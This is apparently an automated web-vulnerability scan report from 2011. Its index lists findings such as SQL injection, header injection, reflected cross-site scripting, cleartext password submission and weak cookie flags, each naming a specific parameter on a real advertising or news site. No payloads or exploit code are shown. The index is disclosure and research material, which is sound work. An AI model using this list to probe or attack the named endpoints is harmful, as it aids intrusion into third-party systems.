XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05092011-02

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 09:36:16 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://l.alvenda.net/e [e parameter]

1.2. http://l.alvenda.net/e [so parameter]

1.3. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx [REST URL parameter 2]

2. HTTP header injection

2.1. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3 [REST URL parameter 1]

2.2. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday [name of an arbitrarily supplied request parameter]

2.3. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday [secure parameter]

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 2]

3.2. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 3]

3.3. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [name of an arbitrarily supplied request parameter]

3.4. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [tgt parameter]

3.5. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [REST URL parameter 2]

3.6. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [REST URL parameter 3]

3.7. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [name of an arbitrarily supplied request parameter]

3.8. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [sz parameter]

3.9. http://a.collective-media.net/adj/q1.q.gc.6170/news [REST URL parameter 2]

3.10. http://a.collective-media.net/adj/q1.q.gc.6170/news [REST URL parameter 3]

3.11. http://a.collective-media.net/adj/q1.q.gc.6170/news [name of an arbitrarily supplied request parameter]

3.12. http://a.collective-media.net/adj/q1.q.gc.6170/news [sz parameter]

3.13. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 1]

3.14. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 2]

3.15. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 3]

3.16. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [sz parameter]

3.17. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 1]

3.18. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 2]

3.19. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 3]

3.20. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [sz parameter]

3.21. http://ad.doubleclick.net/adj/cm.tribune/uscell_ldev_300x600_05311 [net parameter]

3.22. http://ad.doubleclick.net/adj/trb.orlandosentinel/biz [;ptype parameter]

3.23. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.24. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.26. http://admatch-syndication.mochila.com/viewer/channel/badgex [buyerId parameter]

3.27. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

3.28. http://admeld.adnxs.com/usersync [admeld_callback parameter]

3.29. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

3.30. http://ar.voicefive.com/b/rc.pli [func parameter]

3.31. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.32. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.33. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.34. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.35. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.36. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.37. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.38. http://bid.openx.net/json [c parameter]

3.39. http://choices.truste.com/ca [c parameter]

3.40. http://choices.truste.com/ca [cid parameter]

3.41. http://choices.truste.com/ca [iplc parameter]

3.42. http://choices.truste.com/ca [js parameter]

3.43. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]

3.44. http://choices.truste.com/ca [ox parameter]

3.45. http://choices.truste.com/ca [plc parameter]

3.46. http://choices.truste.com/ca [zi parameter]

3.47. http://content.pulse360.com/cgi-bin/context.cgi [id parameter]

3.48. http://ct.buzzfeed.com/wd/UserWidget [amp;or parameter]

3.49. http://ct.buzzfeed.com/wd/UserWidget [u parameter]

3.50. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json [callback parameter]

3.51. http://edge.viagogo.co.uk/feeds/widget.ashx [PCID parameter]

3.52. http://event.adxpose.com/event.flow [uid parameter]

3.53. http://floridatoday.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.54. http://ib.adnxs.com/ab [cnd parameter]

3.55. http://ib.adnxs.com/ab [custom_macro parameter]

3.56. http://ib.adnxs.com/ptj [redir parameter]

3.57. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

3.58. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

3.59. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

3.60. http://js.revsci.net/gateway/gw.js [csid parameter]

3.61. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 2]

3.62. http://mf.sitescout.com/tag.jsp [h parameter]

3.63. http://mf.sitescout.com/tag.jsp [pid parameter]

3.64. http://mf.sitescout.com/tag.jsp [w parameter]

3.65. http://odb.outbrain.com/utils/odb [callback parameter]

3.66. http://pglb.buzzfed.com/124044/2cda0cc53888bd4bde08b06faa4b2d81 [callback parameter]

3.67. http://r.turn.com/server/pixel.htm [fpid parameter]

3.68. http://r.turn.com/server/pixel.htm [sp parameter]

3.69. http://sitelife.floridatoday.com/ver1.0/daapi2.api [jpcb parameter]

3.70. http://sitelife.floridatoday.com/ver1.0/daapi2.api [jpctx parameter]

3.71. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif [REST URL parameter 1]

3.72. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

3.73. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

3.74. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

3.75. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

3.76. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

3.77. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

3.78. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

3.79. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

3.80. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]

3.81. http://wd.sharethis.com/api/getCount2.php [cb parameter]

3.82. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]

3.83. http://wd.sharethis.com/api/getCount2.php [url parameter]

3.84. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [evt parameter]

3.85. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [evt parameter]

3.86. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [siteid parameter]

3.87. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [siteid parameter]

3.88. https://www.ccnow.com/cgi-local/checkout.cgi [shipto parameter]

3.89. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 1]

3.90. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]

3.91. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]

3.92. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]

3.93. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [name of an arbitrarily supplied request parameter]

3.94. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [name of an arbitrarily supplied request parameter]

3.95. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 1]

3.96. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 2]

3.97. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 3]

3.98. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 4]

3.99. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 5]

3.100. http://www.clashmusic.com/user/a [REST URL parameter 1]

3.101. http://www.clashmusic.com/user/a [REST URL parameter 2]

3.102. http://www.clashmusic.com/user/a [REST URL parameter 2]

3.103. http://www.clashmusic.com/user/a [name of an arbitrarily supplied request parameter]

3.104. http://www.clashmusic.com/user/password [REST URL parameter 1]

3.105. http://www.clashmusic.com/user/password [REST URL parameter 2]

3.106. http://www.clashmusic.com/user/password [REST URL parameter 2]

3.107. http://www.clashmusic.com/user/password [name of an arbitrarily supplied request parameter]

3.108. http://www.clashmusic.com/user/register [REST URL parameter 1]

3.109. http://www.clashmusic.com/user/register [REST URL parameter 2]

3.110. http://www.clashmusic.com/user/register [REST URL parameter 2]

3.111. http://www.clashmusic.com/user/register [name of an arbitrarily supplied request parameter]

3.112. http://www.irishtimes.com/newspaper/mostread/pagelog.cfm [REST URL parameter 3]

3.113. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 2]

3.114. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 4]

3.115. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 5]

3.116. http://www.nme.com/adcode/hot-spot.html [REST URL parameter 1]

3.117. http://www.nme.com/favicon.ico [REST URL parameter 1]

3.118. http://www.nme.com/hotspot/channel/news [REST URL parameter 1]

3.119. http://www.nme.com/news/sufjan-stevens/56527 [REST URL parameter 1]

3.120. http://ib.adnxs.com/ttj [Referer HTTP header]

3.121. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [cli cookie]

3.122. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [cli cookie]

3.123. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [cli cookie]

3.124. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

3.125. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

3.126. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

3.127. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

3.128. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

3.129. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

3.130. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

3.131. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

3.132. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

3.133. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

3.134. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

3.135. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [cli cookie]

3.136. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [cli cookie]

3.137. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie]

3.138. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js [ruid cookie]

3.139. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js [ruid cookie]

3.140. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js [ruid cookie]

3.141. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js [ruid cookie]

3.142. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js [ruid cookie]

3.143. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js [ruid cookie]

3.144. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js [ruid cookie]

3.145. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.146. http://tag.contextweb.com/TagPublish/getad.aspx [V cookie]

3.147. http://tag.contextweb.com/TagPublish/getad.aspx [cwbh1 cookie]

4. Flash cross-domain policy

4.1. http://ad-apac.doubleclick.net/crossdomain.xml

4.2. http://ad.au.doubleclick.net/crossdomain.xml

4.3. http://adserver.adtech.de/crossdomain.xml

4.4. http://adserverams.adtech.de/crossdomain.xml

4.5. http://alvenda.122.2o7.net/crossdomain.xml

4.6. http://api.brightcove.com/crossdomain.xml

4.7. http://cspix.media6degrees.com/crossdomain.xml

4.8. http://f2nthevine.112.2o7.net/crossdomain.xml

4.9. http://ie-stat.bmmetrix.com/crossdomain.xml

4.10. http://imp.fetchback.com/crossdomain.xml

4.11. http://in.getclicky.com/crossdomain.xml

4.12. http://ipcmedia.122.2o7.net/crossdomain.xml

4.13. http://irishtimesgroup.112.2o7.net/crossdomain.xml

4.14. http://p.addthis.com/crossdomain.xml

4.15. http://pixel.33across.com/crossdomain.xml

4.16. http://s0.2mdn.net/crossdomain.xml

4.17. http://secure-au.imrworldwide.com/crossdomain.xml

4.18. http://va.px.invitemedia.com/crossdomain.xml

4.19. http://edge.viagogo.co.uk/crossdomain.xml

4.20. http://l.alvenda.net/crossdomain.xml

4.21. http://optimized-by.rubiconproject.com/crossdomain.xml

4.22. http://static.nme.com/crossdomain.xml

4.23. http://west.thomson.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad-apac.doubleclick.net/clientaccesspolicy.xml

5.2. http://ad.au.doubleclick.net/clientaccesspolicy.xml

5.3. http://alvenda.122.2o7.net/clientaccesspolicy.xml

5.4. http://f2nthevine.112.2o7.net/clientaccesspolicy.xml

5.5. http://ipcmedia.122.2o7.net/clientaccesspolicy.xml

5.6. http://irishtimesgroup.112.2o7.net/clientaccesspolicy.xml

5.7. http://pixel.33across.com/clientaccesspolicy.xml

5.8. http://s0.2mdn.net/clientaccesspolicy.xml

5.9. http://secure-au.imrworldwide.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

6.2. http://www.clashmusic.com/user/a

6.3. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

6.4. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

6.5. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

7. Session token in URL

7.1. http://api.brightcove.com/services/library

7.2. http://l.sharethis.com/pview

7.3. http://www.apture.com/js/apture.js

7.4. http://www.facebook.com/extern/login_status.php

7.5. http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html

7.6. http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story

7.7. http://www.orlandosentinel.com/business/transparent

8. Password field submitted using GET method

8.1. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

8.2. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

9. Cookie scoped to parent domain

9.1. http://api.twitter.com/1/statuses/user_timeline.json

9.2. http://t.mookie1.com/t/v1/imp

9.3. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

9.4. http://www.nme.com/news/sufjan-stevens/56527

9.5. http://ad.afy11.net/ad

9.6. http://ad.turn.com/server/pixel.htm

9.7. http://admeld.adnxs.com/usersync

9.8. http://ads.adbrite.com/adserver/vdi/742697

9.9. http://ads.pointroll.com/PortalServe/

9.10. http://ads.revsci.net/adserver/ako

9.11. http://ads.revsci.net/adserver/ako

9.12. http://ads.revsci.net/adserver/ako

9.13. http://ads.revsci.net/adserver/ako

9.14. http://ads.revsci.net/adserver/ako

9.15. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH

9.16. http://adserver.adtech.de/bind

9.17. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

9.18. http://ar.voicefive.com/b/wc_beacon.pli

9.19. http://ar.voicefive.com/bmx3/broker.pli

9.20. http://b.scorecardresearch.com/b

9.21. http://b.scorecardresearch.com/r

9.22. http://b.voicefive.com/b

9.23. http://bh.contextweb.com/bh/rtset

9.24. http://bid.openx.net/json

9.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.26. http://cf.addthis.com/red/p.json

9.27. http://content.pulse360.com/cgi-bin/context.cgi

9.28. http://core.insightexpressai.com/adServer/adServerESI.aspx

9.29. http://cspix.media6degrees.com/orbserv/hbpix

9.30. http://cw-m.d.chango.com/m/cw

9.31. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2931142961646634775

9.32. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775

9.33. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2931142961646634775

9.34. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2931142961646634775

9.35. http://data.adsrvr.org/map/cookie/contextweb

9.36. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json

9.37. http://edge.quantserve.com/quant.js

9.38. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

9.39. http://floridatoday.us.intellitxt.com/intellitxt/front.asp

9.40. http://gpaper114.112.2o7.net/b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519

9.41. http://i.w55c.net/ping_match.gif

9.42. http://ib.adnxs.com/ab

9.43. http://ib.adnxs.com/getuid

9.44. http://ib.adnxs.com/if

9.45. http://ib.adnxs.com/mapuid

9.46. http://ib.adnxs.com/ptj

9.47. http://ib.adnxs.com/seg

9.48. http://ib.adnxs.com/ttj

9.49. http://idpix.media6degrees.com/orbserv/hbpix

9.50. http://image2.pubmatic.com/AdServer/Pug

9.51. http://imp.fetchback.com/serve/fb/adtag.js

9.52. http://imp.fetchback.com/serve/fb/imp

9.53. http://ipcmedia.grapeshot.co.uk/channels.cgi

9.54. http://js.revsci.net/gateway/gw.js

9.55. http://leadback.advertising.com/adcedge/lb

9.56. http://newspaper.app40.ur.gcion.com/GCION.ashx

9.57. http://odb.outbrain.com/utils/odb

9.58. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

9.59. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js

9.60. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js

9.61. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js

9.62. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js

9.63. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js

9.64. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js

9.65. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js

9.66. http://p.brilig.com/contact/bct

9.67. http://pix04.revsci.net/B08725/b3/0/3/1008211/17329585.js

9.68. http://pix04.revsci.net/D08734/a1/0/0/0.gif

9.69. http://pix04.revsci.net/I10982/b3/0/3/1003161/448768738.js

9.70. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

9.71. http://pix04.revsci.net/J06575/b3/0/3/1003161/306691632.gif

9.72. http://pixel.33across.com/ps/

9.73. http://pixel.invitemedia.com/data_sync

9.74. http://pixel.quantserve.com/pixel

9.75. http://pixel.rubiconproject.com/tap.php

9.76. http://r.openx.net/set

9.77. http://r.turn.com/r/bd

9.78. http://r.turn.com/server/pixel.htm

9.79. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

9.80. http://rt.legolas-media.com/lgrt

9.81. http://services.krxd.net/pixel.gif

9.82. http://sitelife.floridatoday.com/ver1.0/daapi2.api

9.83. http://sync.mathtag.com/sync/img

9.84. http://syndication.mmismm.com/tntwo.php

9.85. http://t.invitemedia.com/track_imp

9.86. http://tacoda.at.atwola.com/rtx/r.js

9.87. http://tag.contextweb.com/TagPublish/getad.aspx

9.88. http://tags.bluekai.com/site/2731

9.89. http://tags.bluekai.com/site/3358

9.90. http://tap.rubiconproject.com/oz/sensor

9.91. http://trgca.opt.fimserve.com/fp.gif

9.92. http://va.px.invitemedia.com/pixel

9.93. http://www.burstnet.com/enlightn/7578//12A4/

10. Cookie without HttpOnly flag set

10.1. http://admatch-syndication.mochila.com/viewer/channel/badgeCSS

10.2. http://admatch-syndication.mochila.com/viewer/channel/badgex

10.3. http://ads.adxpose.com/ads/ads.js

10.4. http://event.adxpose.com/event.flow

10.5. http://s.clickability.com/s

10.6. http://t.mookie1.com/t/v1/imp

10.7. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

10.8. http://www.nme.com/news/sufjan-stevens/56527

10.9. http://ad.afy11.net/ad

10.10. http://ad.turn.com/server/pixel.htm

10.11. http://ad.yieldmanager.com/iframe3

10.12. http://ad.yieldmanager.com/imp

10.13. http://ad.yieldmanager.com/pixel

10.14. http://ad.yieldmanager.com/unpixel

10.15. http://ads.adbrite.com/adserver/vdi/742697

10.16. http://ads.pointroll.com/PortalServe/

10.17. http://ads.revsci.net/adserver/ako

10.18. http://ads.revsci.net/adserver/ako

10.19. http://ads.revsci.net/adserver/ako

10.20. http://ads.revsci.net/adserver/ako

10.21. http://ads.revsci.net/adserver/ako

10.22. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951880%7C0%7C170%7CADTECH

10.23. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH

10.24. http://adserver.adtech.de/bind

10.25. http://adserver.clashmusic.com/www/delivery/lg.php

10.26. http://adserver.clashmusic.com/www/delivery/spc.php

10.27. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

10.28. http://api.twitter.com/1/statuses/user_timeline.json

10.29. http://api.twitter.com/1/statuses/user_timeline.json

10.30. http://ar.atwola.com/atd

10.31. http://ar.voicefive.com/b/wc_beacon.pli

10.32. http://ar.voicefive.com/bmx3/broker.pli

10.33. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003016/pixel.gif

10.34. http://b.scorecardresearch.com/b

10.35. http://b.scorecardresearch.com/r

10.36. http://b.voicefive.com/b

10.37. http://bandcamp.com/EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//

10.38. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/

10.39. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/

10.40. http://bh.contextweb.com/bh/rtset

10.41. http://bid.openx.net/json

10.42. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.43. http://cf.addthis.com/red/p.json

10.44. http://content.pulse360.com/cgi-bin/context.cgi

10.45. http://contextweb-match.dotomi.com/

10.46. http://core.insightexpressai.com/adServer/adServerESI.aspx

10.47. http://cspix.media6degrees.com/orbserv/hbpix

10.48. http://cw-m.d.chango.com/m/cw

10.49. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2931142961646634775

10.50. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775

10.51. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2931142961646634775

10.52. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2931142961646634775

10.53. http://d.tradex.openx.com/ajs.php

10.54. http://d.tradex.openx.com/lg.php

10.55. http://data.adsrvr.org/map/cookie/contextweb

10.56. http://data.cmcore.com/imp

10.57. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json

10.58. http://edge.quantserve.com/quant.js

10.59. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

10.60. http://floridatoday.us.intellitxt.com/intellitxt/front.asp

10.61. http://gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH

10.62. http://gannett.gcion.com/addyn/3.0/5111.1/896067/0/-1/ADTECH

10.63. http://gpaper114.112.2o7.net/b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519

10.64. http://i.w55c.net/ping_match.gif

10.65. http://idpix.media6degrees.com/orbserv/hbpix

10.66. http://ie-stat.bmmetrix.com/V13a

10.67. http://ie-stat.bmmetrix.com/V13b

10.68. http://image2.pubmatic.com/AdServer/Pug

10.69. http://imp.fetchback.com/serve/fb/adtag.js

10.70. http://imp.fetchback.com/serve/fb/imp

10.71. http://ipcmedia.122.2o7.net/b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795

10.72. http://ipcmedia.grapeshot.co.uk/channels.cgi

10.73. http://irishtimesgroup.112.2o7.net/b/ss/itgirishtimesprod/1/H.15.1/s81982920831069

10.74. http://js.revsci.net/gateway/gw.js

10.75. http://latent.alvenda.net/Latent.html

10.76. http://leadback.advertising.com/adcedge/lb

10.77. http://media.adfrontiers.com/pq

10.78. http://newspaper.app40.ur.gcion.com/GCION.ashx

10.79. http://oads.mochila.com/openx/www/delivery/ajs.php

10.80. http://oads.mochila.com/www/delivery/lg.php

10.81. http://odb.outbrain.com/utils/odb

10.82. http://openx2-match.dotomi.com/

10.83. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

10.84. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js

10.85. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js

10.86. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js

10.87. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js

10.88. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js

10.89. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js

10.90. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js

10.91. http://p.brilig.com/contact/bct

10.92. http://pix04.revsci.net/B08725/b3/0/3/1008211/17329585.js

10.93. http://pix04.revsci.net/D08734/a1/0/0/0.gif

10.94. http://pix04.revsci.net/I10982/b3/0/3/1003161/448768738.js

10.95. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

10.96. http://pix04.revsci.net/J06575/b3/0/3/1003161/306691632.gif

10.97. http://pixel.33across.com/ps/

10.98. http://pixel.invitemedia.com/data_sync

10.99. http://pixel.quantserve.com/pixel

10.100. http://pixel.rubiconproject.com/tap.php

10.101. http://r.openx.net/set

10.102. http://r.turn.com/r/bd

10.103. http://r.turn.com/server/pixel.htm

10.104. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

10.105. http://rt.legolas-media.com/lgrt

10.106. http://services.krxd.net/pixel.gif

10.107. http://sitelife.floridatoday.com/ver1.0/Content/images/store/12/1/6c2f9a14-d970-4d97-b1b8-998eda420787.Large.jpg

10.108. http://sitelife.floridatoday.com/ver1.0/Content/images/store/13/14/3d0cb25d-d19d-4993-ae7a-7bb7b30af008.Large.jpg

10.109. http://sitelife.floridatoday.com/ver1.0/Direct/DirectProxy

10.110. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/json-min.js

10.111. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/pork.iframe.js

10.112. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/requestbatch.js

10.113. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/requesttypes.js

10.114. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/yahoo-min.js

10.115. http://sitelife.floridatoday.com/ver1.0/daapi2.api

10.116. http://sitelife.floridatoday.com/ver1.0/direct/javascriptsdkproxy

10.117. http://sync.mathtag.com/sync/img

10.118. http://syndication.mmismm.com/tntwo.php

10.119. http://t.invitemedia.com/track_imp

10.120. http://tacoda.at.atwola.com/rtx/r.js

10.121. http://tag.contextweb.com/TagPublish/getad.aspx

10.122. http://tags.bluekai.com/site/2731

10.123. http://tags.bluekai.com/site/3358

10.124. http://tap.rubiconproject.com/oz/sensor

10.125. http://trgca.opt.fimserve.com/fp.gif

10.126. http://va.px.invitemedia.com/pixel

10.127. http://west.thomson.com/VendorFeeds/Alvendify/AlvendaImpression.aspx

10.128. http://www.burstbeacon.com/view/103170/64948/182030/318088/3050/2D1A28EF/

10.129. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

10.130. http://www.burstnet.com/enlightn/7578//12A4/

10.131. http://www.ccnow.com/cgi-local/cart.cgi

10.132. http://www.ccnow.com/cgi-local/sc_cart.cgi

10.133. https://www.ccnow.com/cgi-local/cart.cgi

10.134. https://www.ccnow.com/cgi-local/checkout.cgi

10.135. https://www.ccnow.com/cgi-local/sc_cart.cgi

11. Password field with autocomplete enabled

11.1. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

11.2. http://www.clashmusic.com/user/a

11.3. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

11.4. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

11.5. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

12. Referer-dependent response

